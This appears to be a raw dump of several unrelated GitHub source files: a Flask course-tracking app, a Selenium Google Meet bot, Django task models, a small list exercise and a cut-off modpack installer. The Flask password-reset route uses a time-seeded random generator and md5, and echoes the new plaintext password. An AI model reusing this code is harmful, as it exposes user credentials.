test_date\n testlog.user = int(s_user)\n testlog.problems = s_problems\n db.session.add(testlog)\n db.session.commit()\n return jsonify(result = 'Информация о тесте сохранена.')\n\n users = db.session.query(User)\\\n .join(Learner, Learner.user_id == User.id)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n suggested_test_number = max(x[0] for x in db.session.query(TestLog.test_number).filter(TestLog.user == users[0].id).all()) + 1\n\n users = { u.id : '{0} {1}'.format(u.firstname, u.lastname) for u in users }\n\n event_to_number = { 'SEEN': 0, 'TRIED': 1, 'ALMOST': 2, 'SUCCESS': 3 }\n trajectory_list = Trajectory.query.first().topics.split('|')\n trajectory_topics = list(set(trajectory_list))\n trajectory_list = list(map(int, trajectory_list))\n problems_for_trajectory = Problem.query.filter(Problem.topics.in_(trajectory_topics)).all()\n problem_ids = list(p.id for p in problems_for_trajectory)\n clones = defaultdict(set)\n problems_by_topic = defaultdict(list)\n for p in problems_for_trajectory:\n problems_by_topic[int(p.topics)].append(p)\n if p.clones and len(p.clones) > 0:\n c = [int(i) for i in p.clones.split(',')]\n clones[p.id].update(c)\n for cid in clones[p.id]:\n clones[cid].add(p.id)\n\n log_info = ''\n # if flask_login.current_user.username == tpbeta_superuser_username:\n # log_info = '; '.join(str(cid) + ' : ' + ','.join(str(t) for t in clones[cid]) for cid in clones)\n\n problem_sets = dict()\n\n for user_id in users:\n user_history = { i: -1 for i in problem_ids }\n user_history_items = History.query.filter(History.user == user_id, History.problem.in_(problem_ids))\n for h in user_history_items:\n if h.event in event_to_number:\n user_history[h.problem] = max(user_history[h.problem], event_to_number[h.event])\n user_remaining_trajectory_items = trajectory_list[:]\n counted_problems = set()\n for i, t in enumerate(user_remaining_trajectory_items):\n for p in problems_by_topic[t]:\n if user_history[p.id] >= 2 and p.id not in counted_problems:\n user_remaining_trajectory_items[i] = 0\n counted_problems.add(p.id)\n if p.id in clones:\n counted_problems.update(clones[p.id])\n break\n\n user_remaining_trajectory_items = filter(None, user_remaining_trajectory_items)\n used_problem_ids = set()\n problems_for_user = list()\n for topic_id in user_remaining_trajectory_items:\n for p in problems_by_topic[topic_id]:\n if user_history[p.id] == -1 and (p.id not in used_problem_ids):\n problems_for_user.append(p)\n used_problem_ids.add(p.id)\n if p.id in clones:\n used_problem_ids.update(clones[p.id])\n break\n else:\n for p in problems_by_topic[topic_id]:\n if user_history[p.id] <= 1 and (p.id not in used_problem_ids):\n problems_for_user.append(p)\n used_problem_ids.add(p.id)\n if p.id in clones:\n used_problem_ids.update(clones[p.id])\n break\n problem_sets[user_id] = []\n for p in problems_for_user[:max_problems]:\n problem_sets[user_id].append({\n 'id': p.id,\n 'text': latex_to_html(p.statement, variation=current_variation[p.id])\n })\n current_variation[p.id] += 1\n\n return render_template(\n 'test_printout.html',\n problems = problem_sets,\n users = users,\n group = group_number,\n suggested_test_number = suggested_test_number,\n date = date.today().isoformat(),\n max_problems = max_problems,\n log_info = log_info)\n\n\n@app.route('/learnerdashboard')\n@flask_login.login_required\ndef learner_dashboard():\n if not flask_login.current_user or not hasattr(flask_login.current_user, 'username'):\n return redirect(url_for('login'))\n username = flask_login.current_user.username\n logs = TestLog.query.filter_by(user = flask_login.current_user.id).all()\n if len(logs) == 0:\n return 'Не найдено записей о результатах контрольных работ пользователя <em>{0}</em>'.format(username)\n return 'Найдены записи о тестах, проводившихся в следующие даты:<br>' + '<br>'.join( '<a href=\"{1}\">{0}</a>'.format(log.datetime.isoformat()[:10], url_for('test_results', test_number = log.test_number )) for log in logs)\n\n@app.route('/learnerdashboard/test/<int:test_number>', methods = ['GET'])\n@flask_login.login_required\ndef test_results(test_number):\n user_id = flask_login.current_user.id\n if ('user' in request.args) and flask_login.current_user.username in teachers:\n user_id = int(request.args['user'])\n\n log = TestLog.query.filter_by(user = user_id, test_number = test_number).first()\n if not log:\n return \"Не найдена информация о тесте\"\n test_history = History.query.filter_by(user = user_id, comment = 'TEST{0}'.format(test_number)).all()\n result_translator = {'SEEN' : '∅', 'TRIED' : '□', 'ALMOST' : '◩', 'SUCCESS' : '■'}\n u_history = {h.problem: result_translator[h.event] for h in test_history if h.event in result_translator}\n problem_ids = list(map(int, log.problems.split(',')))\n marks = problem_ids[:]\n for i, id in enumerate(problem_ids):\n marks[i] = {\n 'result': u_history.get(id, ''),\n 'id': id\n }\n\n return render_template(\n 'student_test_results.html',\n name = db.session.query(User.username).filter(User.id == user_id).first()[0],\n test = test_number,\n marks = marks\n )\n\n@app.route('/learnerdashboard/trajectory', methods=['GET'])\n@flask_login.login_required\ndef trajectory_progress():\n user_id = flask_login.current_user.id\n if ('user' in request.args) and flask_login.current_user.username in teachers:\n user_id = int(request.args['user'])\n\n event_to_number = { 'SEEN': 0, 'TRIED': 1, 'ALMOST': 2, 'SUCCESS': 3 }\n number_to_square = {-1 : '□', 0 : '□', 1 : '□', 2 : '◩', 3 : '■'}\n all_topics = Topic.query.all()\n topic_names = { t.id: t.topic for t in all_topics }\n topic_levels = { t.id: t.level for t in all_topics }\n trajectory_list = Trajectory.query.first().topics.split('|')\n trajectory_topics = list(set(trajectory_list))\n trajectory_list = list(map(int, trajectory_list))\n problems_for_trajectory = Problem.query.filter(Problem.topics.in_(trajectory_topics)).all()\n problem_ids = list(p.id for p in problems_for_trajectory)\n clones = defaultdict(set)\n problems_by_topic = defaultdict(list)\n for p in problems_for_trajectory:\n problems_by_topic[int(p.topics)].append(p)\n if p.clones and len(p.clones) > 0:\n c = [int(i) for i in p.clones.split(',')]\n clones[p.id].update(c)\n for cid in clones[p.id]:\n clones[cid].add(p.id)\n\n user_history_items = History.query.filter(History.user == user_id, History.problem.in_(problem_ids))\n user_history = { i: -1 for i in problem_ids }\n review_requests = dict()\n for h in user_history_items:\n if h.event == 'REVIEW_REQUEST':\n review_requests[h.problem] = h\n if h.event in event_to_number:\n user_history[h.problem] = max(user_history[h.problem], event_to_number[h.event])\n trajectory_results = [0] * len(trajectory_list)\n result_witnesses = [0] * len(trajectory_list)\n counted_problems = set()\n for i, t in enumerate(trajectory_list):\n for p in problems_by_topic[t]:\n if user_history[p.id] >= 2 and p.id not in counted_problems:\n trajectory_results[i] = user_history[p.id]\n result_witnesses[i] = p.id\n counted_problems.add(p.id)\n if p.id in clones:\n counted_problems.update(clones[p.id])\n break\n results = []\n for i in range(len(trajectory_list)):\n r = {\n 'topic': topic_names[trajectory_list[i]],\n 'level': topic_levels[trajectory_list[i]],\n 'result' : number_to_square[trajectory_results[i]],\n 'witness' : result_witnesses[i],\n 'status' : ''\n }\n if trajectory_results[i] == 2:\n problem_id = result_witnesses[i]\n h = db.session.query(History.datetime).filter(History.user == user_id, History.problem == problem_id, History.event == 'ALMOST').first()\n if h and h[0]:\n delta = datetime.now() - h[0]\n if problem_id in review_requests:\n review_request = review_requests[problem_id]\n if review_request.comment and len(review_request.comment) > 0:\n tokens = review_request.comment.split('|', maxsplit=2)\n reviewer = tokens[0]\n if len(tokens) == 1:\n r['comment'] = 'Ваше решение на проверке у {0}'.format(reviewer)\n r['status'] = 'REVIEWER_ASSIGNED'\n else:\n r['status'] = tokens[1]\n if len(tokens) == 3:\n r['comment'] = tokens[2]\n else:\n r['comment'] = 'Ваше решение на проверке у {0}'.format(reviewer)\n else:\n r['comment'] = 'Запрос на проверку отправлен, но проверяющий ещё не назначен.'\n else:\n r['comment'] = 'Вы ещё не отправляли запрос на проверку этой задачи.<br>На сдачу дорешки осталось {0} дней'.format(21 - delta.days)\n r['status'] = 'REVIEW_NOT_REQUESTED'\n\n results.append(r)\n\n return render_template('student_trajectory.html',\n results = results,\n user = user_id\n )\n\n@app.route('/users')\n@flask_login.login_required\ndef show_user_list():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to view userlist\"\n users = User.query.all()\n for u in users:\n u.name = u.lastname + ' ' + u.firstname\n return render_template(\n 'user_list.html',\n users = sorted(users, key=lambda u: u.name),\n superuser = (flask_login.current_user.username == tpbeta_superuser_username))\n\n@app.route('/recover_password', methods=['POST'])\n@flask_login.login_required\ndef recover_password():\n if flask_login.current_user.username != tpbeta_superuser_username:\n return jsonify(result = 'Login error')\n\n if 'user_id' not in request.json:\n return jsonify(result = 'Error')\n\n user_id = int(request.json['user_id'])\n user = User.query.filter_by(id=user_id).first()\n\n if not user.email:\n return jsonify(result = 'Невозможно выслать пароль: не указан email.')\n\n random.seed(str(datetime.now()))\n letters = 'qwertyuiopasdfghjklzxcvbnm1029384756'\n new_password = ''.join(letters[int(random.random()*len(letters))] for _ in range(8))\n\n msg = Message( subject = 'Временный пароль к информационной системе по курсу ДС',\n body = '''Ваше имя пользователя для входа в систему: {0}\\nВаш пароль для входа: {1}'''.format(user.username,new_password),\n recipients = [user.email])\n mail.send(msg)\n\n user.pwdhash = md5(new_password)\n db.session.commit()\n\n return jsonify(result = 'Успешно выслан пароль \"{0}\"'.format(new_password))\n\n@app.route('/corrections', methods=['GET', 'POST'])\n@flask_login.login_required\ndef corrections_interface():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to mark corrections\"\n\n if request.method == 'POST':\n if not request.json or 'user' not in request.json or 'problem' not in request.json or 'result' not in request.json:\n return jsonify(result = 'Ошибка сохранения.')\n user = int(request.json['user'])\n problem = int(request.json['problem'])\n result = int(request.json['result'])\n if result == 1:\n new_item = History()\n new_item.user = user\n new_item.problem = problem\n new_item.event = 'SUCCESS'\n new_item.comment = 'CORRECTION'\n new_item.datetime = datetime.now()\n db.session.add(new_item)\n db.session.commit()\n return jsonify(result = 'Задача {0} помечена как зачтённая'.format(problem))\n else:\n item = History.query.filter_by(user=user, problem=problem, event='SUCCESS', comment = 'CORRECTION').first()\n if not item:\n return jsonify(result = 'Задача {0} не найдена среди помеченных зачтённых задач'.format(problem))\n db.session.delete(item)\n db.session.commit()\n return jsonify(result = 'Задача {0} удалена из зачтённых'.format(problem))\n\n history_items_almost = History.query.filter_by(event='ALMOST').all()\n history_items_success = History.query.filter_by(event='SUCCESS', comment='CORRECTION').all()\n users = User.query.all()\n usernames = dict()\n for u in users:\n usernames[u.id] = u.username\n\n remaining_corrections = defaultdict(dict)\n for item in history_items_almost:\n remaining_corrections[item.user][item.problem] = 0\n for item in history_items_success:\n if item.user in remaining_corrections and item.problem in remaining_corrections[item.user]:\n remaining_corrections[item.user][item.problem] = 1\n\n data = []\n for uid in remaining_corrections:\n latex_project_url = db.session.query(Learner.latex_project_url).filter(Learner.user_id==uid).first()\n if latex_project_url:\n latex_project_url = latex_project_url[0]\n if not latex_project_url:\n latex_project_url = ''\n data.append({\n 'id': uid,\n 'name': usernames[uid],\n 'url': latex_project_url,\n 'problems': sorted(({'id': pid, 'result': res} for pid,res in remaining_corrections[uid].items()), key=lambda x: x['id'])\n })\n data.sort( key = lambda x: usernames[x['id']] )\n return render_template('corrections.html', data=data)\n\ndef notify_user(user_id, subject, body):\n user_data = User.query.filter_by(id=user_id).first()\n if not user_data.email:\n return\n message = Message(subject=\"Курс ДС: {}\".format(subject),\n body=\"Здравствуйте, {}!\\n{}\".format(user_data.firstname, body),\n recipients=[user_data.email])\n mail.send(msg)\n\n@app.route('/review', methods=['POST','GET'])\n@flask_login.login_required\ndef review_interface():\n if request.method == 'POST':\n if not request.json or 'user' not in request.json or 'problem' not in request.json or 'action' not in request.json:\n return jsonify(result = 'Ошибка сохранения')\n user = int(request.json['user'])\n problem = int(request.json['problem'])\n action = request.json['action']\n if action == 'SEND_FOR_REVIEW':\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if h:\n return jsonify(result = 'Запрос на проверку уже был отправлен ранее.')\n h = History()\n h.datetime = datetime.now()\n h.user = user\n h.problem = problem\n h.event = 'REVIEW_REQUEST'\n db.session.add(h)\n db.session.commit()\n return jsonify(result = 'Запрос отправлен')\n elif action == 'RESEND_FOR_REVIEW':\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if not h:\n return jsonify(result = 'Запрос на проверку ранее не отправлялся.')\n tokens = h.comment.split('|')\n tokens[1] = 'REVIEW_REQUEST_RESENT'\n h.comment = '|'.join(tokens[:2])\n db.session.commit()\n return jsonify(result = 'Запрос отправлен')\n elif action == 'TAKE_FOR_REVIEW' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n h.comment = flask_login.current_user.username\n db.session.commit()\n return jsonify(result = 'Успешно изменён проверяющий для задачи', reviewer = flask_login.current_user.username)\n elif action == 'DELETE_REQUEST' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n db.session.delete(h)\n db.session.commit()\n return jsonify(result = 'Запрос на проверку закрыт')\n elif action == 'SEND_FOR_REWORK' and flask_login.current_user.username in teachers:\n h = History.query.filter_by(user=user, problem=problem, event='REVIEW_REQUEST').first()\n if 'comment' in request.json:\n comment = request.json['comment']\n else:\n comment = 'Проверяющий {0} затребовал доработку решения'.format(flask_login.current_user.username)\n h.comment = '{0}|{1}|{2}'.format(flask_login.current_user.username, 'REWORK_REQUIRED', comment)\n notify_user(user, \"Ваше решение отправлено на доработку\",\n \"Ваша дорешка по задаче {} отправлена на доработку с комментарием: {}\".format(problem, comment));\n db.session.commit()\n return jsonify(result = 'Запрос на доработку отправлен')\n elif action == 'REMOVE_EXPIRED':\n if flask_login.current_user.username != tpbeta_superuser_username:\n return jsonify(result = 'Только суперпользователь может выполнять этот запрос')\n n_deleted = 0\n n_close_to_expiration = 0\n for i in History.query.filter_by(event='ALMOST').all():\n if db.session.query(History.id).filter(History.user==i.user, History.problem==i.problem, History.event.in_(['SUCCESS','REVIEW_REQUEST'])).first():\n continue\n if not i.datetime:\n continue\n delta = datetime.now() - i.datetime\n if delta.days <= 21:\n continue\n if delta.days > 18:\n n_close_to_expiration += 1\n db.session.delete(i)\n n_deleted += 1\n db.session.commit()\n return jsonify(result = 'Удалено {0} просроченных заданий; {1} заданий близки к просроченным'.format(n_deleted, n_close_to_expiration))\n\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to mark corrections\"\n history_items = History.query.filter_by(event='REVIEW_REQUEST').all()\n items = []\n for h in history_items:\n username = db.session.query(User.username).filter(User.id == h.user).first()[0]\n reviewer = ''\n state = 'Ожидает проверки с {0}'.format(h.datetime)\n formal_state = 'PENDING'\n\n if h.comment:\n tokens = h.comment.split('|', maxsplit=2)\n reviewer = tokens[0]\n if len(tokens) > 1:\n formal_state = tokens[1]\n if formal_state == 'REWORK_REQUIRED':\n state = 'Находится на доработке'\n if formal_state == 'REVIEW_REQUEST_RESENT':\n state = 'Студент доработал решение и отправил запрос на перепроверку'\n\n latex_project_url = db.session.query(Learner.latex_project_url).filter(Learner.user_id==h.user).first()\n if latex_project_url:\n latex_project_url = latex_project_url[0]\n if not latex_project_url:\n latex_project_url = ''\n\n items.append({\n 'username' : username,\n 'url': latex_project_url,\n 'user_id' : h.user,\n 'problem': h.problem,\n 'reviewer': reviewer,\n 'state': state,\n 'formal_state' : formal_state\n })\n return render_template('review_requests_list.html',\n items = items,\n show_remove_expired_ui = (flask_login.current_user.username == tpbeta_superuser_username))\n\n\n@app.route('/topic_stats')\ndef show_topic_stats():\n trajectory_topic_ids = list(map(int, Trajectory.query.first().topics.split('|')))\n topics = Topic.query.filter( Topic.id.in_(trajectory_topic_ids) )\n\n data = []\n for topic in topics:\n topic_problem_ids = [x[0] for x in db.session.query(Problem.id).filter(Problem.topics == str(topic.id)).all()]\n history_items_users = [x[0] for x in db.session.query(History.user).filter(History.problem.in_(topic_problem_ids), History.event.in_(['SUCCESS', 'ALMOST'])).all()]\n user_progress = defaultdict(int)\n for u in history_items_users:\n user_progress[u] += 1\n\n qty_in_trajectory = sum(1 for i in trajectory_topic_ids if i == topic.id)\n data.append({\n 'topic' : topic.topic,\n 'qty_in_trajectory' : qty_in_trajectory,\n 'num_problems' : len(topic_problem_ids),\n 'num_tries' : db.session.query(History.id).filter(History.problem.in_(topic_problem_ids)).count(),\n 'num_successful_tries' : len(history_items_users),\n 'num_clears' : sum( 1 for u in user_progress if user_progress[u] == qty_in_trajectory )\n })\n\n return render_template('problem_stats.html',data=data)\n\n\n@app.route('/comments')\n@flask_login.login_required\ndef view_comments():\n if flask_login.current_user.username not in teachers:\n return 'Просматривать комментарии могут только преподаватели'\n\n comments = ProblemComment.query.all()\n\n comments_processed = []\n usernames = dict()\n\n for c in sorted(comments, key=lambda x: x.datetime, reverse=True):\n if c.author not in usernames:\n user_id, username = db.session.query(User.id, User.username).filter(User.id == c.author).first()\n usernames[user_id] = username\n comments_processed.append({\n 'text' : c.text if len(c.text) < 1000 else c.text[:1000] + '…',\n 'author_username' : usernames[c.author],\n 'author_id' : c.author,\n 'datetime' : c.datetime.isoformat().replace('T', '<br>').replace('-','‑'),\n 'problem_id' : c.problem_id\n })\n\n return render_template('view_all_comments.html', comments = comments_processed)\n\n\n@app.route('/')\ndef root():\n if not flask_login.current_user or not hasattr(flask_login.current_user, 'username'):\n mode = ''\n elif flask_login.current_user.username in teachers:\n mode = 'teacher'\n else:\n mode = 'learner'\n\n return render_template('landing.html', mode = mode)\n","repo_name":"nzinov/tpbeta","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":52765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34368098458","text":"import sys\nimport selenium\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nimport os\nfrom enum import Enum\nimport threading\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport time as t\nfrom utils import *\n\n\n'''Locating by xpath here is the best thing to do here, since google Meet changes selectors, classes name and all that sort of stuff for every meeting\n XPaths remaing the same, but a slight change by them would make this program fail.\n The xpath is found clicking by inspecting the element of the searched button, and finding the parent div tthat has role=\"button\" tag\n'''\n\nMIC_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[3]/div[1]/div/div/div'\nWEBCAM_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[3]/div[2]/div/div'\nJOIN_XPATH = '/html/body/div[1]/c-wiz/div/div/div[8]/div[3]/div/div/div[2]/div/div[1]/div[2]/div/div[2]/div/div/div[1]'\nOPTION_XPATH = '/html/body/div[1]/c-wiz/div/div/div[6]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div'\n\nCHAT_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[6]/div[3]/div/div[2]/div[3]'\nCHAT_SELECTCHAT_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[3]/div/div[2]/div[2]/div[1]/div[2]'\n\n#Using tagname for text area because xpath doesn't really work, and we're sure it's the only textarea on the webpage\nCHAT_TEXT_XPATH = \"textarea\"\n\nHANG_UP_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[8]/div[3]/div[9]/div[2]/div[2]/div'\n\nCHAT_CLOSE_BTN_XPATH = '/html/body/div[1]/c-wiz/div[1]/div/div[6]/div[3]/div[3]/div/div[2]/div[1]/div[2]/div/button'\n\nbrowser = None\n\ndef initFirefox():\n global browser\n\n browser = webdriver.Firefox(firefox_profile=webdriver.FirefoxProfile(FIREFOX_PROFILE), executable_path=FIREFOX_DVD_DIR)\n\ndef joinMeeting(link):\n global browser\n\n if link == '':\n return\n\n try:\n browser.get(link)\n t.sleep(15)\n print(\"Trying to join meeting\")\n clickButton(By.XPATH, MIC_XPATH)\n clickButton(By.XPATH, WEBCAM_XPATH)\n clickButton(By.XPATH, JOIN_XPATH)\n except:\n # In this way, in case of any error we can try again\n print(\"Failed to join meeting, trying again in 60 secs\")\n t.sleep(60)\n joinMeeting(link)\n\n\ndef clickButton(by, selector):\n global browser\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).click()\n t.sleep(1)\n\ndef writeText(by, selector, text):\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).clear()\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((by, selector))).send_keys(text + \"\\n\")\n\ndef sendChatMsg(text):\n global browser\n\n #open chat menu\n clickButton(By.XPATH, CHAT_BTN_XPATH)\n #select chat option\n clickButton(By.XPATH, CHAT_SELECTCHAT_BTN_XPATH)\n #write msg\n writeText(By.TAG_NAME, CHAT_BTN_XPATH, text)\n t.sleep(1)\n #close chat\n clickButton(By.XPATH, CHAT_CLOSE_BTN_XPATH)\n\n\ndef checkStarted():\n try:\n clickButton(By.XPATH, OPTION_XPATH)\n except:\n return False\n return True\n\ndef hangUpMeeting():\n try:\n clickButton(By.XPATH, HANG_UP_BTN_XPATH)\n except:\n return False\n return True\n","repo_name":"EmaMaker/GoogleMeetBot","sub_path":"browser_manager.py","file_name":"browser_manager.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16154105940","text":"lista = []\nwhile True:\n n = int(input('Digite um valor: '))\n lista.append(n)\n resp = ' '\n while resp not in \"SsNn\":\n resp = str(input('Desjea continuar (S/N): ')).upper().strip()\n if resp in 'Nn':\n break\nprint(f'A) A lista possui {len(lista)} valores.')\nlista2 = lista[:]\nlista2.sort(reverse=True)\nprint(f'B) A lista em ordem decresente fica assims: {lista2}.')\nprint('C) O número 5 foi digitado?', end=' ')\nif 5 in lista:\n print(f'Sim! Ele está na {lista2.index(5) + 1}ª posição.')\nelse:\n print('Não.')","repo_name":"sauliiin/Python-from-Padawan-to-Jedi","sub_path":"085.py","file_name":"085.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28908439481","text":"from django.db import models\r\nfrom django.utils import timezone\r\nfrom users.models import StudentsGroup\r\nfrom django_quill.fields import QuillField\r\nfrom django.contrib.auth import get_user_model\r\n\r\nUser = get_user_model()\r\n# Create your models here.\r\n\r\n\r\nclass Tasks(models.Model):\r\n \"\"\" VAZIFALAR UCHUN MODEL \"\"\"\r\n teacher = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name=\"O'qituvchi\", related_name=\"teachers\")\r\n student = models.ForeignKey(StudentsGroup, on_delete=models.SET_NULL, null=True, verbose_name=\"Gurux nomi\", related_name=\"students_group\")\r\n title = models.CharField(max_length=500, verbose_name=\"Vazifa mavzusi\")\r\n description = QuillField(verbose_name=\"Tafsiloti\")\r\n complite = models.BooleanField(default=False, verbose_name=\"Bitdi\")\r\n order_num = models.IntegerField(default=0, verbose_name=\"Tartib raqami\")\r\n add_time = models.DateTimeField(default=timezone.now, blank=True, verbose_name=\"Vazifa berilayotgan vaqt\")\r\n complite_time = models.DateTimeField(verbose_name=\"Vazifani topshirish vaqti\")\r\n active = models.BooleanField(default=True)\r\n slug = models.SlugField(verbose_name=\"slug\", max_length=300)\r\n update_time = models.DateTimeField(auto_now=True)\r\n\r\n def __str__(self):\r\n return str(self.title)\r\n\r\n def __unicode__(self):\r\n return str(self.title)\r\n \r\n def get_comments(self):\r\n total = self.commenttasks_set.all() \r\n return total\r\n \r\n class Meta:\r\n db_table = ''\r\n managed = True\r\n ordering = [\"order_num\"]\r\n verbose_name = \"Tasks\"\r\n verbose_name_plural = \"Tasks\"\r\n\r\n\r\nclass CommentTasks(models.Model):\r\n \"\"\" VAZIFALAR UCHUN IZOHLAR \"\"\"\r\n author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, related_name=\"comment_authors\")\r\n to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, related_name=\"comment_tos\")\r\n task = models.ForeignKey(Tasks, on_delete=models.SET_NULL, null=True, blank=True)\r\n comment = models.TextField(verbose_name=\"Izoh\")\r\n add_time = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return str(self.author)\r\n\r\n def __unicode__(self):\r\n return str(self.author)\r\n \r\n class Meta:\r\n db_table = ''\r\n managed = True\r\n verbose_name = \"Izohlar\"\r\n verbose_name_plural = \"Izohlar\"\r\n\r\nclass AnswerTasks(models.Model):\r\n \"\"\" JAVOBLARNI QOLDIRISH UCHUN \"\"\"\r\n student = models.ForeignKey(User, related_name=\"answer_students\", on_delete=models.SET_NULL, null=True)\r\n teacher = models.ForeignKey(User, related_name=\"task_teacher\", on_delete=models.SET_NULL, null=True)\r\n task = models.ForeignKey(Tasks, on_delete=models.SET_NULL, null=True)\r\n comment = QuillField()\r\n file = models.FileField(upload_to=\"file/answers/%Y-%m-%d/\", blank=True, null=True)\r\n checked = models.BooleanField(default=False)\r\n add_time = models.DateTimeField(auto_now_add=True)\r\n update_time = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return f\"{self.student} | {self.task}\"\r\n\r\n def __unicode__(self):\r\n return str(self.student)\r\n \r\n class Meta:\r\n db_table = \"\"\r\n managed = True\r\n verbose_name = \"Javoblar\"\r\n verbose_name_plural = \"Javoblar\"","repo_name":"ZohidilloPr/onlineTeacher","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72426211145","text":"import os\nimport glob\nimport json\nfrom shutil import copy2\nfrom filecmp import cmp as compare\nfrom argparse import ArgumentParser\nfrom make_mod_patch import mod_patch\n\n\ndef make_modpack(modpack_name, overwrite):\n print(\"\\nAssembling modpack...\")\n fileIndex = dict()\n whitelist = open('whitelist.txt').read().split('\\n')\n # Keep only the alphanumeric characters in the names in the whitelist, remove blank lines:\n whitelist = [''.join(char for char in list_entry if char.isalnum()) for list_entry in whitelist if list_entry]\n\n patch_created = False\n if os.path.isdir(f\"mod{os.sep}{modpack_name}\") and not overwrite:\n print(f\"The {modpack_name} directory already exists...\")\n patch_name = ''.join(char for char in modpack_name if char.isalnum()) + \"Patch\"\n if os.path.isdir(f\"mod{os.sep}{patch_name}\"):\n print(\"It looks like a modpack patch has already been created for this modpack. Checking for new changes.\")\n new_changes_present = mod_patch(modpack_name, check_only=True)\n if new_changes_present:\n print(f\"\\nIt looks like there are additional changes in your {modpack_name} folder aside from those saved in {patch_name}.\")\n print(f\"This process will abort in order to prevent loss of changes in your {modpack_name} or overwriting of files in your {patch_name} folder.\")\n print(f\"To force skip the patch creation process and overwrite files in the {modpack_name} folder, run \\\"installer.py -ovr\\\"\")\n print(f\"To force the updating of the contents of {patch_name}, run \\\"make_mod_patch.py\\\" and then run \\\"installer.py\\\" again.\")\n print(\"If the only differing files are in the modpack patch itself, you must run \\\"installer.py -ovr\\\" to push those files into the modpack.\")\n return\n else:\n print(\"There are no additional changes in the modpack aside from those already in the patch.\")\n else:\n patch_created = mod_patch(modpack_name, add_to_whitelist=False)\n print(\"Continuing to assemble modpack...\\n\")\n\n for entry in whitelist:\n fileList = glob.glob(f'mod{os.sep}{entry}{os.sep}interface{os.sep}**', recursive=True)\n for cur_file in fileList:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n file_path[1] = modpack_name # Change folder to the modpack.\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod in fileIndex:\n # There is already a file at this path in the modpack, it is either a conflict or a duplicate.\n if compare(cur_file, os.sep.join(file_path)):\n fileIndex[path_within_mod][0].append(f\"DUPLICATE: {entry.strip()}\")\n fileIndex[path_within_mod][2] += 1\n continue # Skip duplicate files.\n # File is a conflict:\n fileIndex[path_within_mod][0].append(f\"CONFLICT: {entry.strip()}\")\n fileIndex[path_within_mod][1] += 1\n file_path[1] = f\"{modpack_name}_conflicts!\" # Copy the conflicting file to the conflicts folder.\n fname, extension = file_path[-1].split('.')\n file_path[-1] = fname + \".\" + extension + \" \" + entry.strip() + \".\" + extension\n print(f\"Confict detected. Moving to {os.sep.join(file_path[1:])}.\")\n else:\n # First time we've seen a file at this path.\n # First entry in the dict is for mod source, second is for conflict count, third is for repeat count.\n fileIndex[path_within_mod] = [[(f\"SELECTED: {entry.strip()}\")], 0, 0]\n # Make dirs if necessary:\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n # Copy the mod file to its destination.\n copy2(cur_file, target_path)\n\n print(\"\\n\\nDone copying files.\")\n if fileIndex:\n with open(f'mod{os.sep}{modpack_name}{os.sep}whitelist.txt', \"w+\") as f:\n f.writelines([i +'\\n' for i in whitelist])\n\n conflicts_dict = dict()\n duplicates_dict = dict()\n for i in fileIndex:\n if fileIndex[i][1]:\n conflicts_dict[i] = fileIndex[i][0]\n if fileIndex[i][2]:\n duplicates_dict[i] = fileIndex[i][0]\n fileIndex[i] = fileIndex[i][0]\n\n # Output a list of all files.\n with open(f\"mod{os.sep}{modpack_name}{os.sep}allFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(fileIndex, indent = 4))\n if duplicates_dict:\n # Output a list of duplicate files.\n with open(f\"mod{os.sep}{modpack_name}{os.sep}duplicateFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(duplicates_dict, indent = 4))\n print(f\"Duplicate files listed in 